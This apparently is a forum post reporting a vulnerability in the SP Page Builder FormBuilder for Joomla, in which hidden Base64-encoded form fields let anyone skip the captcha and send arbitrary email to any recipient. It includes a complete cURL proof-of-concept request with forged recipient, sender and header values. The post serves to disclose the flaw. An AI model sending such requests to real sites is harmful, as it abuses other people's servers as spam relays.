SP Page Builder: FormBuilder Vulnerability
Dmitriy
- FormBuilder allows anyone to send email with any text to any address
- FormBuilder allows anyone to ignore captcha.
The reason: FormBuilder encodes all parameters (sender address, recipient address, email text and so on) in Base64 and stores in hidden form fields. Then server side uses values from these fields, but not from stored plugin parameters.
Thus, if someone modifies the request (using PostMan, for instance), it makes possible to completely ignore captcha (simply removing captcha-related fields from the request), and to send any email to any repecient (modifying corresponding fields). And that allows usage of your server as a Spam-bot.
Also, I suspect, this vulnerability exist even if you didn't create Forms and just installed SP Page Builder.
Simple cURL example, in which I modified fields, removed captcha and sent the email to external address:
curl --location --request POST 'yourdomain' \
--header 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' \
--header 'Accept: */*' \
--header 'X-Requested-With: XMLHttpRequest' \
--data-urlencode 'addon=form_builder' \
--data-urlencode 'data[0][name]=form-builder-item-[first-name*]' \
--data-urlencode 'data[0][value]=Test 9' \
--data-urlencode 'data[10][name]=success_message' \
--data-urlencode 'data[10][value]=0J/QvtCy0ZbQtNC+0LzQu9C10L3QvdGPINGD0YHQv9GW0YjQvdC+INCy0ZbQtNC/0YDQsNCy0LvQtdC90LUh' \
--data-urlencode 'data[11][name]=failed_message' \
--data-urlencode 'data[11][value]=0JzQuCDQvdC1INC30LzQvtCz0LvQuCDQstGW0LTQv9GA0LDQstC40YLQuCDQv9C+0LLRltC00L7QvNC70LXQvdC90Y8uINCR0YPQtNGMINC70LDRgdC60LAsINC/0LXRgNC10LLRltGA0YLQtSDQvtCx0L7QsifRj9C30LrQvtCy0ZYg0L/QvtC70Y8g0YLQsCDRgdC/0YDQvtCx0YPQudGC0LUg0YnQtSDRgNCw0Lch' \
--data-urlencode 'data[14][name]=policy' \
--data-urlencode 'data[14][value]=Yes' \
--data-urlencode 'data[15][name]=is_policy' \
--data-urlencode 'data[15][value]=true' \
--data-urlencode 'data[16][name]=module_id' \
--data-urlencode 'data[16][value]=151' \
--data-urlencode 'data[17][name]=view_type' \
--data-urlencode 'data[17][value]=module' \
--data-urlencode 'data[1][name]=form-builder-item-[phone*]' \
--data-urlencode 'data[1][value]=2323' \
--data-urlencode 'data[2][name]=form-builder-item-[email*]' \
--data-urlencode 'data[2][value][email protected]' \
--data-urlencode 'data[3][name]=form-builder-item-[message*]' \
--data-urlencode 'data[3][value]=Test 9' \
--data-urlencode 'data[4][name]=recipient' \
--data-urlencode 'data[4][value]=c29tZWJvZHlAZ21haWwuY29t' \
--data-urlencode 'data[5][name]=from' \
--data-urlencode 'data[5][value]=c29tZWJvZHlAZ21haWwuY29t' \
--data-urlencode 'data[6][name]=addon_id' \
--data-urlencode 'data[6][value]=1652456565291' \
--data-urlencode 'data[7][name]=additional_header' \
--data-urlencode 'data[7][value]=UmVwbHktVG86IHt7ZW1haWx9fQpSZXBseS1uYW1lOiB7e2ZpcnN0LW5hbWV9fQ==' \
--data-urlencode 'data[8][name]=email_subject' \
--data-urlencode 'data[8][value]=0JfQsNGP0LLQutCwINC90LAg0LHQtdGB0LrQvtGI0YLQvtCy0L3RgyDQtNC10LzQvtC90YHRgtGA0LDRhtGW0Y4gfCB7e3NpdGUtbmFtZX19' \
--data-urlencode 'data[9][name]=email_template' \
--data-urlencode 'data[9][value]=PHA+PHN0cm9uZz7QktGW0LQ6PC9zdHJvbmc+IHt7Zmlyc3QtbmFtZX19PC9wPgo8cD48c3Ryb25nPtCi0LXQu9C10YTQvtC9Ojwvc3Ryb25nPiB7e3Bob25lfX08L3A+CjxwPjxzdHJvbmc+RW1haWw6PC9zdHJvbmc+IHt7ZW1haWx9fTwvcD4KPHA+PHN0cm9uZz7Qn9C+0LLRltC00L7QvNC70LXQvdC90Y86PC9zdHJvbmc+IHt7bWVzc2FnZX19PC9wPg==' \
--data-urlencode 'option=com_sppagebuilder' \
--data-urlencode 'task=ajax'SP Page Builder Pro 3.8.6 Joomla 4.1.1 Helix Ultimate 2
